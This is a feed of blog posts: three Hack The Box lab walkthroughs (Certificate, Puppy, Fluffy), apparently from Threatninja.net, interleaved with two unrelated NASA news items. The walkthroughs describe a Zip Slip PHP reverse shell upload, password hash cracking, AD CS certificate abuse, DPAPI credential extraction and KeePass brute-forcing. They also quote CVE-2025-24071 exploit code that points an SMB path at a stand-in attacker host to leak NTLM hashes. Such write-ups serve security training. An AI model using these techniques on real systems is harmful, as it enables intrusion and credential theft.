To get full control (root), we abused the machineβs certificate system that issues digital ID cards. By requesting and extracting certificate material and using a small trick to handle the serverβs clock, we converted those certificate files into administrative credentials. With those elevated credentials we accessed the system as an admin and read the root.txt file for the root flag.
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oA initial 10.10.11.71Nmap Output:
ββ[dark@parrot]β[~/Documents/htb/certificate]
ββββΌ $nmap -sC -sV -oA initial 10.10.11.71
# Nmap 7.94SVN scan initiated Tue Sep 30 21:48:51 2025 as: nmap -sC -sV -oA initial 10.10.11.71
Nmap scan report for 10.10.11.71
Host is up (0.048s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
|_http-title: Did not follow redirect to http://certificate.htb/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-01 03:49:25Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-01T03:50:56+00:00; +2h00m32s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
Service Info: Hosts: certificate.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h00m30s, deviation: 2s, median: 2h00m30s
| smb2-security-mode: 3:1:1: Message signing enabled and required
| smb2-time: date: 2025-10-01T03:50:14Analysis:
The websiteβs interface initially appears conventional.
The Account tab contains options for logging in and registering.
Letβs create a new account here.
You can register in the same way as shown above.
The registration was successful.
Therefore, letβs log in using the credentials we created earlier.
Successful access will display an interface similar to the one shown above.
Clicking the course tab displays the interface shown above.
As a result, letβs enrol in the course.
There are many sessions, but the quiz is what caught my attention at the moment.
There is an upload button available in the quizz section.
We are required to upload a report in PDF, DOCX, PPTX, or XLSX format.
After a while, I uploaded a form.pdf file that contained empty content.
Once the file is successfully uploaded, we need to click the βHEREβ link to verify that it has been uploaded into the system.
It worked like a charm.
Zip Slip is a critical arbitrary file overwrite vulnerability that can often lead to remote command execution. The flaw impacts thousands of projects, including those from major vendors such as HP, Amazon, Apache, and Pivotal. While this type of vulnerability has existed previously, its prevalence has recently expanded significantly across a wide range of projects and libraries.
Letβs implement a PHP reverse shell to establish a reverse connection back to our host.
Compress the PDF into dark.zip and upload it as a standard archive file.
We also compress the test directory, which includes exploit.php, into a ZIP archive.
Combine the two ZIP archives into a single ZIP file for upload as part of an authorized security assessment in an isolated testing environment.
Initiate the listener.
Upload the shell.zip file to the designated test environment within the authorized, isolated assessment scope.
Access the specified URL within the isolated test environment to observe the applicationβs behavior.
After a short interval, the connection was reestablished.
Among numerous users, the account xamppuser stood out.
Consequently, inspect the certificate.htb directory located under /xampp/htdocs.
I discovered information indicating that we can utilise the MySQL database.
Executing the MySQL command returned no errors, which is a positive sign.
As a result, we navigated to /xampp/mysql/bin, used mysql.exe to run SQL commands, and successfully located the database.
The users table drew my attention.
There is a significant amount of information associated with several users.
While scrolling down, we identified a potential user named sara.b.
The hash was collected as shown above.
All the hashes use Blowfish (OpenBSD), WoltLab Burning Board 4.x, and bcrypt algorithms.
When using Hashcat, a specific hash mode is required.
After extended processing, the password for the suspected account sara.b was recovered as Blink182.
Attempting to access the machine using Sara.Bβs credentials.
Unfortunately, Sara.Bβs desktop contains no files.
We can proceed with further analysis using the BloodHound platform.
Sara.B Enumeration for Lateral Movement
We can observe the WS-01 directory.
There are two different file types present.
The Description.txt file reports an issue with Workstation 01 (WS-01) when accessing the Reports SMB share on DC01. Incorrect credentials correctly trigger a βbad credentialsβ error, but valid credentials cause File Explorer to freeze and crash. This suggests a misconfiguration or fault in how WS-01 handles the SMB share, potentially due to improper permissions or corrupt settings. The behavior indicates a point of interest for further investigation, as valid access attempts lead to system instability instead of normal access.
Download the pcap file to our machine for further analysis.
There are numerous packets available for further investigation.
Upon careful analysis of packet 917, I extracted the following Kerberos authentication hash: $krb5pa$18$Lion.SK$CERTIFICATE.HTB$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0.
Alternatively, we can use a Python script here
Save the hash to hash.txt.
The recovered password is !QAZ2wsx.
This confirms that the account lion.sk can authenticate to WinRM using the password !QAZ2wsx.
We successfully accessed the lion.sk account as expected.
Read the user flag by running the command: type user.txt.
Privilege Escalation:
Sara.B is listed as a member of Account Operators and has GenericAll rights over the lion.sk account. In plain terms, that means Sara.B can fully manage the lion.sk user β change its password, modify attributes, add it to groups, or even replace its credentials. Because Account Operators is a powerful builtβin group and GenericAll grants nearβcomplete control over that specific account, this is a highβrisk configuration: an attacker who compromises Sara.B (or abuses her privileges) could take over lion.sk and use it to move laterally or escalate privileges.
Synchronise the system clock with certificate.htb using ntpdate: ntpdate -s certificate.htb
In a company, employees get digital certificatesβlike special ID cardsβthat prove who they are and what theyβre allowed to do. The ESC3 vulnerability happens when certain certificates allow users to request certificates on behalf of others. This means someone with access to these certificates can pretend to be another person, even someone with higher privileges like an admin.
Because of this, an attacker could use the vulnerability to gain unauthorized access to sensitive systems or data by impersonating trusted users. Itβs like being able to get a fake ID that lets you enter restricted areas.
Fixing this involves limiting who can request these certificates and carefully controlling the permissions tied to them to prevent misuse.
Using lion.sk credentials, Certipy enumerated 35 certificate templates, one CA (Certificate-LTD-CA), 12 enabled templates, and 18 issuance policies. Initial CA config retrieval via RRP failed due to a remote registry issue but succeeded on retry. Web enrollment at DC01.certificate.htb timed out, preventing verification. Certipy saved results in text and JSON formats and suggests using -debug for stack traces. Next steps: review saved outputs and confirm DC01βs network/service availability before retrying.
Certipy flagged the template as ESC3 because it contains the Certificate Request Agent EKU β meaning principals allowed to enrol from this template (here CERTIFICATE.HTB\Domain CRA Managers, and Enterprise Admins listed) can request certificates on behalf of other accounts. In practice, that lets those principals obtain certificates that impersonate higherβprivilege users or services (for example ,issuing a cert for a machine or a user you donβt control), enabling AD CS abuse and potential domain escalation.
Request the certificate and save it as lion.sh.pfx.
Sara.B is a member of Account Operators and has GenericAll permissions on the ryan.k account β in simple terms, Sara.B can fully control ryan.k (reset its password, change attributes, add/remove group membership, or replace credentials). This is high risk: if Sara.B is compromised or abused, an attacker can take over ryan.k and use it for lateral movement or privilege escalation. Recommended actions: limit membership in powerful groups, remove unnecessary GenericAll delegations, and monitor/accountβchange audit logs.
Certipy requested a certificate via RPC (Request ID 22) and successfully obtained a certificate for UPN ryan.k@certificate.htb; the certificate object SID is S-1-5-21-515537669-4223687196-3249690583-1117 and the certificate with its private key was saved to ryan.k.pfx.
Unfortunately, the clock skew is too large.
When using the faketime command, it behaves as expected.
With explicit permission and in a controlled environment, verify whether the extracted hash can authenticate as ryan.k for investigative purposes.
The following privileges are enabled: SeMachineAccountPrivilege β Add workstations to the domain; SeChangeNotifyPrivilege β Bypass traverse checking; SeManageVolumePrivilege β Perform volume maintenance tasks; SeIncreaseWorkingSetPrivilege β Increase a processβs working set.
Letβs create a temporary directory.
While executing the command, we encountered the error Keyset does not exist, indicating the required cryptographic key material is missing or inaccessible.
Therefore, we need to transfer the SeManageVolumeExploit.exe file to the target machine.
It refers to entries that have been modified.
I ran icacls on Windows, and it successfully processed 1 file with 0 failures.
Finally, it worked exactly as I expected.
We can now download the ca.pfx file to our local machine
We can convert the ca.pfx file into admin.pfx.
Authentication failed because the clock skew is too significant.
After switching to faketime, it worked like a charm.
Read the root flag by running the command: type root.txt.
The post Hack The Box: Certificate Machine Walkthrough β Hard Difficulty appeared first on Threatninja.net.
In this writeup, we will explore the βPuppyβ machine from Hack The Box, categorised as an Medium difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
The goal of this walkthrough is to complete the βPuppyβ machine from Hack The Box by achieving the following objectives:
User Flag:
Gaining the user flag on the Puppy machine was a calculated strike. Using levi.jamesβs credentials, I escalated access by adding the account to the DEVELOPERS group, unlocking the DEV share. Brute-forcing the recovery.kdbx file with the password βLiverpoolβ exposed ant.edwards:Antman2025!, which enabled resetting ADAM.SILVERβs password. A swift WinRM login as ADAM.SILVER and a quick βtype user.txtβ snagged the flag from the desktop.
Root Flag:
The root flag fell after a relentless push through credential exploitation. From a backup file in C:\Backups, I extracted steph.cooper:ChefSteph2025! and used it to access a WinRM shell. Exfiltrating DPAPI keys via an SMB share and decrypting them with Impacket unveiled steph.cooper_adm:FivethChipOnItsWay2025!. Logging in as this user opened the Administrator directory, where βtype root.txtβ delivered the final prize.
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oA initial -Pn 10.10.11.70Nmap Output:
ββ[dark@parrot]β[~/Documents/htb/puppy]
ββββΌ $nmap -sC -sV -oA initial -Pn 10.10.11.70
# Nmap 7.94SVN scan initiated Fri Sep 26 16:50:55 2025 as: nmap -sC -sV -oA initial -Pn 10.10.11.70
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-27 03:25:03Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2049/tcp open nlockmgr 1-4 (RPC #100021)
3260/tcp open iscsi?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 6h33m43s
| smb2-time:
| date: 2025-09-27T03:26:54
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and requiredAnalysis:
Executed bloodhound-python with levi.james credentials against puppy.htb (using 10.10.11.70 as the DNS/collector). The tool enumerated Active Directory data (users, groups, computers, sessions, ACLs, trusts, etc.) with -c All and packaged the results into a zipped bundle (--zip) ready for import into BloodHound to map privilege-escalation and lateral-movement paths.
levi.james is in HR and DEVELOPERS and holds GenericWrite β he can modify attributes/DACLs on writable objects; on HTB, use BloodHound to find those machines/groups/service accounts and abuse them (add users to privileged groups, change DACLs, or set an SPN) to escalate.
Using rpcclient, we connected to the target machine as levi.james and enumerated the domain users. The enumeration output listed several accounts, including Administrator, Guest, service accounts such as krbtgt, and multiple regular users like levi.james, ant.edwards, adam.silver, jamie.williams, steph.cooper, and steph.cooper_adm. These findings provide a useful starting point for further steps, such as detailed enumeration or potential password spraying attacks.
Running netexec smb against 10.10.11.70 with levi.jamesβs credentials successfully enumerated SMB shares. The results show IPC$, NETLOGON, and SYSVOL are accessible with read-only permissions, while ADMIN$, C$, and DEV shares are inaccessible. This read access can be useful for gathering domain information or extracting scripts and policies from SYSVOL and NETLOGON for further enumeration.
Running smbclient //10.10.11.70/DEV -U levi.james attempted to access the DEV share using levi.jamesβs credentials. The connection was successful, but when trying to list the contents (ls), the server returned NT_STATUS_ACCESS_DENIED, indicating that the account does not have the required permissions to view or access files in this share.
Using bloodyAD, we connected to the domain controller (dc.puppy.htb) with levi.jamesβs credentials and successfully added the user levi.james to the DEVELOPERS group, granting him all privileges associated with the group. After re-authenticating, we reconnected to the DEV share with smbclient and were able to list its contents. The share contained several notable items, including KeePassXC-2.7.9-Win64.msi, a Projects folder, recovery.kdbx (a KeePass database), and tiCPYdaK.exe. These files provide valuable leads for further enumeration, with the KeePass database being a strong candidate for extracting credentials to escalate privileges or move laterally within the network.
Downloaded the recovery.kdbx file from the DEV share to the local machine for offline analysis.
The file command identified recovery.kdbx as a KeePass 2.x KDBX password database.
We ran keepass2john on the file to extract password hashes, but it failed with an error indicating that the file version 40000 is not supported, so no hashes could be generated.
Cloning that repository downloads the keepass4brute project from GitHub to your local machine, giving you the scripts, tools, and documentation included by the author for attempting offline recovery or brute-force against KeePass databases. After cloning, check the README for dependencies and usage instructions, verify the tool supports your KDBX version, and run it on a local copy of the database only with explicit authorization β misuse may be illegal or unethical.
The repository we cloned to our machine contains four items: .gitignore (ignored files), LICENSE (project license), README.md (usage and setup instructions), and keepass4brute.sh (the main brute-force script). Review the README and LICENSE before running the script, confirm dependencies, and scan any downloaded executables for malware.
Run the script like this: ./keepass4brute.sh <kdbx-file> <wordlist> to attempt brute-forcing the KeePass database with a specified wordlist.
The script aborted because keepassxc-cli is not installed. Install keepassxc-cli and rerun the script to continue the brute-force attempt.
I found a solution online: run sudo apt update then sudo apt install keepassxc to install KeepassXC (which provides keepassxc-cli). After installation, rerun the script.
The script is working and currently running.
Funny enough, it seems the machine creator might be a Liverpool fan, given that the recovered password is liverpool.
We unlocked recovery.kdbx in KeepassXC using the password Liverpool.
Discovered a KeePass password database associated with the machine.
The user account that can be leveraged for privilege escalation or access.
The screenshots above show each userβs password.
The screenshot above displays the list of usernames.
Above displays the list of usernames along with their passwords.
I ran nxc smb against 10.10.11.70 with user list user.txt and password list password.txt using βcontinue-on-success; only the credential pair ant.edwards:Antman2025! succeeded.
ant.edwards sits in the SeniorDevs group and has GenericAll over adam.silver β meaning ant.edwards has full control of that account (reset password, change group membership, modify attributes or SPNs).
Using bloodyAD against dc.puppy.htb with the credentials ant.edwards:Antman2025!, we reset ADAM.SILVERβs password to p@ssw0d123! The tool reported the change succeeded, giving us direct access to the ADAM.SILVER account for follow-up enumeration or lateral movement.
ADAM.SILVER is currently disabled, so interactive logons with that account will fail until itβs re-enabled. Because ant.edwards has GenericAll over ADAM.SILVER, that account could be re-enabled and its password reset (or userAccountControl changed) to gain access β a straightforward takeover path once permissions are abused.
The bind failed because the LDAP server rejected the credentials β LDAP error code 49 (Invalid credentials). The extra text AcceptSecurityContext ... data 52e specifically indicates a bad username/password. Common causes are an incorrect password, wrong account name format (try DOMAIN\user or user@domain), or the account being locked or disabled. Verify the credentials and account status, then retry the bind.
The server returned an Operations error saying a successful bind is required before performing the search. In short: the LDAP query ran without an authenticated session (or the previous bind failed), so the server refused the operation. Fix by performing a successful bind first β supply valid credentials (try correct UPN or DOMAIN\user format), confirm the account is not locked/disabled, and then rerun the ldapsearch. If the server disallows anonymous/simple binds, use an authenticated bind method.
The LDAP errors were resolved after synchronizing the system clock using ntpdate. Kerberos and Active Directory require closely matched time between client and domain controller; even a small time drift can cause bind failures or βinvalid credentialsβ errors. After correcting the time, the bind succeeded and LDAP queries worked as expected.
A userAccountControl value of 66050 indicates that the account is disabled in Active Directory.
The ldapmodify command was used to connect to the LDAP server with ANT.EDWARDS@PUPPY.HTB and modify Adam D. Silverβs account. It updated the userAccountControl attribute from 66050 (disabled) to 66048, enabling the account while keeping other flags intact. This change allows Adam D. Silver to log in and use his assigned permissions.
Start a WinRM session to 10.10.11.70 using ADAM.SILVER with password p@ssw0rd123! to obtain a remote Windows shell via evil-winrm.
Grab the user flag by running type user.txt in the WinRM shell.
Privilege Escalation:
There is a Backups directory located inside C:\ on the target machine.
The Backups directory contains a file named site-backup-2024-12-30.zip.
Downloaded the backup file to our local machine.
Next, the backup file is extracted to inspect and analyse its contents in detail.
The extracted backup contains two directories, assets and images, along with two files: index.html and nms-auth-config.xml.bak.
The file nms-auth-config.xml.bak caught my attention; it is an XML 1.0 document in ASCII text format.
The nms-auth-config.xml.bak file contains LDAP authentication details, including a bind account cn=steph.cooper,dc=puppy,dc=htb with password ChefSteph2025!, which can be used to query the LDAP server at DC.PUPPY.HTB:389. It also defines how user attributes (uid, givenName, sn, mail) and group attributes (cn, member) are mapped, along with a search filter for querying users. This makes the file both a sensitive credential source and a guide for LDAP enumeration.
Authenticated to 10.10.11.70 over WinRM using steph.cooper:ChefSteph2025! and obtained an interactive shell β host compromised (Pwn3d!)
Established a WinRM session to 10.10.111.70 using steph.cooper:ChefSteph2025! via vil-winrm and obtained an interactive shell β host compromised.
Ran bloodhound-python with steph.cooper:ChefSteph2025! against puppy.htb (collector DNS 10.10.11.70), which enumerated AD objects (users, groups, computers, sessions, ACLs, trusts, etc.) and packaged the output into a zipped bundle ready for import into BloodHound to map privilege-escalation and lateral-movement paths.
STEPH.COOPER@PUPPY.HTB holds DOMAIN ADMINS and ADMINISTRATORS membership, giving full domain-level control, while STEPH.COOPER_ADM@PUPPY.HTB belongs to ENTERPRISE ADMINS, granting top-level, forest-wide privileges across the entire network.
The script iterates every profile under C:\Users and, for each user, prints headings then lists full paths to DPAPI βMaster Keyβ files (under AppData\Roaming\Microsoft\Protect and AppData\Local\Microsoft\Protect) and credential blobs (under AppData\Roaming\Microsoft\Credentials and AppData\Local\Microsoft\Credentials). It suppresses errors when folders donβt exist and outputs the exact file pathsβuseful for locating DPAPI keys and credential files for offline extraction and decryption.
That command starts an SMB server that exposes the local ./share directory as a network share named share with SMB2 support enabled, allowing remote hosts to connect and retrieve or push files (commonly used to serve payloads or collect exfiltrated data during engagements).
I noticed several directories under C:\Users\steph.cooper\AppData\Roaming\Microsoft that can be leveraged.
Permission denied when attempting to access that path.
After some time, I realised we need to create a local directory share on our machine.
Finally, it worked as expected.
Downloaded the files to the local machine successfully.
An error occurred: X509_V_FLAG_NOTIFY_POLICY appeared. This typically relates to SSL/TLS certificate verification issues during the connection or handshake process.
After investigating on my machine, I discovered that the installed PyOpenSSL version is 23.0.0.
To resolve the issue, PyOpenSSL was first uninstalled using sudo pip3 uninstall pyOpenSSL and then reinstalled with the latest version via sudo pip3 install --upgrade pyOpenSSL.
To my surprise, the process worked successfully and produced the following decrypted master key:0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84.
I can now use this key for further analysis or to decrypt stored credentials.
Impacket decoded a domain credential: the Username is steph.cooper_adm and the Unknown field contains the cleartext password FivethChipOnItsWay2025!. Use these credentials to attempt an interactive logon, then assess the accountβs privileges and restrictions before pivoting.
Authenticated to 10.10.11.70 over WinRM with steph.cooper_adm:FivethChipOnItsWay2025! and obtained an interactive shell β host compromised (Pwn3d!).
It completed successfully.
Checked steph.cooper_admβs desktop and did not find the root flag.
An Administrator directory is present β we can explore it for sensitive files and potential privilege escalation.
Grab the root flag by running type root.txt in the shell.
The post Hack The Box: Puppy Machine Walkthrough β Medium Difficulty appeared first on Threatninja.net.
By Savannah Bullard
One year after winning second place in NASAβs Break the Ice Lunar Challenge, members of the small business Starpath visited NASAβs Marshall Space Flight Center in Huntsville, Alabama, as part of their prize opportunity to test their upgraded lunar regolith excavation and transportation rover in the centerβs 20-foot thermal vacuum chamber.
The technology startup headquartered in Hawthorne, California, won second place overall at the Break the Ice Lunar Challengeβs live demonstration and finale in June 2024. This competition, one of NASAβs Centennial Challenges, tasked competitors to design, build, and demonstrate robotic technologies that could excavate and transport the icy, rocky dirt β otherwise known as regolith β found on the Moon.
βNASAβs Centennial Challenges are a great way to discover new, innovative technologies, including those for future use on the Moon and even Mars,β said Naveen Vetcha, Break the Ice Lunar Challenge manager at NASA Marshall. βWorking with winners after the challenge concludes is a perfect example of how we can use NASA facilities to continue advancing these technologies to generate valuable solutions for the agency and industry.β
Starpath built a four-wheeled rover capable of excavating, collecting, and hauling material under extremely harsh environmental conditions that simulate the lunar South Pole. On the rover, a dual drum barrel can extend from the body of the robot β mimicking a movement similar to a crabβs claws β and scrape into rough, hard regolith to excavate material quickly without compromising finite battery life.
Before Starpath made the 2,000-mile drive from California to Alabama this summer, NASA Marshallβs Engineering Test Facility staff prepared a concrete slab outfitted with rocky terrain to act as a testbed for the robot to interact inside the chamber. The V-20 Thermal Vacuum Chamber, located at Marshallβs Environmental Test Facility, can simulate harsh environments by manipulating the chamberβs vacuum, temperature, humidity, and pressure effects. Starpath staff spent about three days at NASA Marshall in August, testing their robot with excavation and mobility trials while collecting data on its performance.
The Starpath team is honing the development of its technology for missions located at the permanently shadowed regions of the lunar South Pole. As a future landing site for NASAβs Artemis missions, which will send astronauts to the Moon and prepare to send the first Americans to Mars, the South Pole region of the Moon is known to contain ice within its regolith. This was the leading inspiration behind the development of the Break the Ice Lunar Challenge, as NASA will require robust technologies that can excavate and transport lunar ice for extraction, purification, and use as drinking water or rocket fuel.
NASAβsΒ Break the Ice Lunar Challenge was aΒ NASA Centennial ChallengeΒ that ran from 2020 to 2024. The challenge was led by the agencyβsΒ Marshall Space Flight Center with support fromΒ NASAβs Kennedy Space CenterΒ inΒ Florida. Centennial Challenges are part of theΒ Prizes, Challenges, and Crowdsourcing programΒ under NASAβsΒ Space Technology Mission Directorate.
For more information about the challenge and its conclusion, visit:
NASAβs 2026 Gateways to Blue Skies competition invites collegiate teams to conceptualize innovative systems and practices that would advance current commercial aircraft maintenance, repair, and operations with the goal to enhance resilience, safety, and efficiency. Β
The commercial aviation industry is a crucial component of the U.S. economy, employing millions and supporting global commerce and tourism. However, the industry faces certain challenges, including the need to reduce rising operational costs in a growing market to accommodate increased demand in air travel, e-commerce, and cargo sectors. Β
NASAβs Aeronautics Research Mission Directorate is dedicated to working with commercial, industry, and government partners in advancing and improving the countryβs aviation sector.Β
βThe aviation maintenance industry is at the heart of what keeps us all flying,β said Steven Holz, NASAβs lead for the Gateways to Blue Skies competition. βHaving our future workforce looking into new technologies, creating, and innovating with a focus on this area of our industry will have lasting impacts on the future of aviation.βΒ
Sponsored by NASAβs University Innovation Project, the Gateways to Blue Skies competition encourages multidisciplinary teams of college students to conceptualize unique systems-level ideas for an aviation-themed problem identified annually. It aims to engage as many students as possible β from all backgrounds, majors, and collegiate levels, freshman to graduate. Students from aviation maintenance and trades schools are encouraged to apply.Β
In this yearβs competition, participating teams of two to six students should propose solutions that focus on a specific maintenance area being addressed, such as predictive maintenance, advanced monitoring, or compliance checks. Competitors must choose technologies that can be deployable by 2035.Β Β
The competition is divided into phases. In Phase 1, teams will submit concepts in a five-to seven-page proposal and accompanying two-minute video, which will be judged in a competitive review process by NASA and industry experts.Β Β
Up to eight finalist teams will be selected to receive a $9,000 prize and advance to Phase 2 of the competition, which includes a review of each teamβs final paper, infographic, and presentation at a forum to be held in May 2026 at NASAβs Langley Research Center in Hampton, Virginia. Forum winners who fulfill eligibility criteria will be offered the opportunity to intern with NASA Aeronautics in the academic year following the forum. Β
Teams interested in participating in the competition should review competition guidelines and eligibility requirements posted on the competition website. Teams are encouraged to submit a non-binding notice of intent by Tuesday, Nov. 4, 2025, via the website. Submitting a notice of intent ensures teams stay apprised of competition news. The proposal and video are due Feb. 16, 2026.Β
The Gateway to Blue Skies competition is administered by the National Institute of Aerospace on behalf of NASA. The NASA Tournament Lab, part of the Prizes, Challenges, and Crowdsourcing Program in the Space Technology Mission Directorate, manages the challenge.
In this write-up, we will explore the βFluffyβ machine from Hack The Box, categorised as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Machine Information
In this scenario, similar to real-world Windows penetration tests, you begin the Fluffy machine with the following credentials: j.fleischman / J0elTHEM4n1990!.
The goal of this walkthrough is to complete the βFluffyβ machine from Hack The Box by achieving the following objectives:
Initial access was gained by exploiting CVE-2025-24071 with a malicious .library-ms file delivered via SMB. The victimβs NTLMv2-SSP hash was captured with Responder and cracked using Hashcat (mode 5600), revealing prometheusx-303. Domain enumeration with BloodHound showed p.agila@fluffy.htb had GenericAll rights over Service Accounts, enabling control of winrm_svc.
We escalated privileges by abusing the ca_svc account, which is a member of Service Accounts and Cert Publishers, granting it AD CS access. Using Certipy, we identified an ESC16 vulnerability, updated ca_svcβs userPrincipalName to impersonate the administrator, generated a certificate, and obtained both a TGT and the NT hash.
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sV -sC -oA initial -Pn 10.10.11.69ββ[dark@parrot]β[~/Documents/htb/fluffy]
ββββΌ $nmap -sV -sC -oA initial -Pn 10.10.11.69
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-18 02:49:59Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
445/tcp open microsoft-ds?464/tcp open kpasswd5?
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-18T02:51:30+00:00; +4h17m24s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-18T02:51:30+00:00; +4h17m24s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17Analysis:
We discovered the Samba share as shown above.
By using impacket-smbclient with the provided credentials, we were able to gain access as shown above.
There are several files saved inside the directory, but one file in particular caught my attention β Upgrade_Notice.pdf.
We proceeded to download the PDF to our local machine.
The PDF outlines the upgrade process and highlights several key vulnerabilities:
.library-ms files in archives trigger SMB connections, leaking NTLM hashes without user action.mholt/archiver, allowing crafted ZIPs to write files outside intended directories, risking data overwrite or misuse.
No other significant information appeared that we could leverage in this context.
The exploit dynamically creates an XML file with a hardcoded SMB path (\\attacker_ip\shared), which Windows automatically processes:
library_content = f"""
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\\\{ip_address}\\shared</url> <!-- Vulnerable: Triggers SMB -->
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>"""
Therefore, we proceeded to exploit it using the manual method, starting with the creation of a malicious .library-ms file.
Once the malicious .library-ms file is successfully created, it needs to be compressed into a ZIP archive.
Initiate the Responder and monitor the incoming network packets for analysis.
As a result, we transferred the malicious.zip to the victimβs machine using smbclient.
We captured the NTLMv2-SSP hash and can now attempt to crack it.
The hash was successfully cracked within one minute, revealing the password: prometheusx-303.
We proceeded to enumerate the environment using BloodHound.
The account p.agila@fluffy.htb is a member of the Service Account Managers@fluffy.htb group, which has GenericAll permissions over the Service Accounts@fluffy.htb group. This means p.agila can fully manage members of the Service Accounts group, including adding, removing, or modifying accounts β a powerful privilege that can be leveraged for privilege escalation.
The accounts ldap_svc@fluffy.htb, ca_svc@fluffy.htb, and winrm_svc@fluffy.htb all belong to the service accounts@fluffy.htb group. They share similar privilege levels and likely support service-related operations, creating a common attack surface if an attacker compromises any one of them.
The domain hierarchy shows that authenticated users@fluffy.htb are members of everyone@fluffy.htb, with domain users inheriting from both authenticated users and users. Authenticated users also have pre-Windows 2000 and Certificate Service DCOM access. The ca_svc account belongs to domain users, service accounts, and cert publishers. While cert publishers is part of the Denied RODC Password Replication Group (blocking password replication to RODCs), it retains certificate publishing rights.
It is also possible to add the user p.agila to the SERVICE ACCOUNTS group.
This process retrieves the NT hash, and you can repeat it for the other two users. The name winrm_svc indicates that you can access it directly through WinRM and authenticate using the hash.
The command uses Certipy to authenticate as the user winrm_svc with a captured NT hash against the domain controller DC01.fluffy.htb. By specifying both the domain controller IP and the target IP, it attempts to perform a pass-the-hash attack, enabling access without needing the plaintext password.
This data contains a substantial amount of information that requires careful analysis and processing.
I noticed the presence of the Cert Publishers group.
